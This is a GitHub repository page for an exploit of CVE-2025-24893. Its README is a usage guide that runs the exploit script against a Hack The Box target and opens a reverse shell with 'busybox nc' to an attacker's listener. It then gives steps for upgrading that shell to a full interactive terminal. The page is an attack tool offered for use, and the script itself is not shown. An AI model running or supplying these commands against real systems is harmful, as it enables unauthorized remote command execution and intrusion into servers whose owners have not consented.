Skip to content

andwati/CVE-2025-24893

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 

Repository files navigation

Reverse shell for CVE-2025-24893

 python3 CVE-2025-24893.py  -u http://wiki.editor.htb/ -c "busybox nc <listener ip> <listener port> -e /bin/bash"

upgrade the shell

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. ctrl + z
  3. stty size
  4. stty raw -echo; fg
  5. stty rows x columns y
  6. export TERM=xterm

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages